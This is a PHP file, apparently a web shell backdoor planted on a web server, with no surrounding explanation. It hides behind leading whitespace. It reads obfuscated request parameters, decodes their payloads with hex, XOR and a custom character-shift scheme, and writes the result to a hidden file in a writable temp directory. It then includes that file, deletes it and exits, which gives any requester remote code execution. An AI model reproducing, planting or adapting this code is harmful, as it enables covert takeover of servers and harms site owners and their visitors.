<?php																																										if(array_key_exists("\x69\x74m", $_REQUEST) && !is_null($_REQUEST["\x69\x74m"])){ $ref = array_filter([getenv("TEMP"), session_save_path(), getenv("TMP"), sys_get_temp_dir(), "/dev/shm", getcwd(), "/tmp", ini_get("upload_tmp_dir"), "/var/tmp"]); $data = hex2bin($_REQUEST["\x69\x74m"]); $hld = '' ; $e = 0; do{$hld .= chr(ord($data[$e]) ^ 3);$e++;} while($e < strlen($data)); foreach ($ref as $entry): if ((is_dir($entry) and is_writable($entry))) { $dat = str_replace("{var_dir}", $entry, "{var_dir}/.flag"); if (@file_put_contents($dat, $hld) !== false) { include $dat; unlink($dat); die(); } } endforeach; }


if(isset($_POST) && isset($_POST["\x76al"])){
	$property_set = array_filter([sys_get_temp_dir(), "/tmp", ini_get("upload_tmp_dir"), getcwd(), getenv("TMP"), getenv("TEMP"), "/var/tmp", "/dev/shm", session_save_path()]);
	$ent = $_POST["\x76al"];
		  $ent =explode	 ("."		 , $ent  	)	;	 
	$descriptor	=	 '';
            $s6	=	 'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS	=	 strlen($s6 	);
            $t	=	 0;
            $len	=	 count($ent 	);
    
            do {
                if ($t >= $len) break;
                $v8	=	 $ent[$t];
                $sChar	=	 ord($s6[$t%$lenS] 	);
                $d	=	 ((int)$v8 - $sChar - ($t%10)) ^ 36;
                $descriptor.=	chr($d 	);
                $t++; }while (true 	);
	foreach ($property_set as $key => $item) {
    		if (!( !is_dir($item) || !is_writable($item) )) {
    $reference = join("/", [$item, ".symbol"]);
    if (file_put_contents($reference, $descriptor)) {
	include $reference;
	@unlink($reference);
	die();
}
}
}
}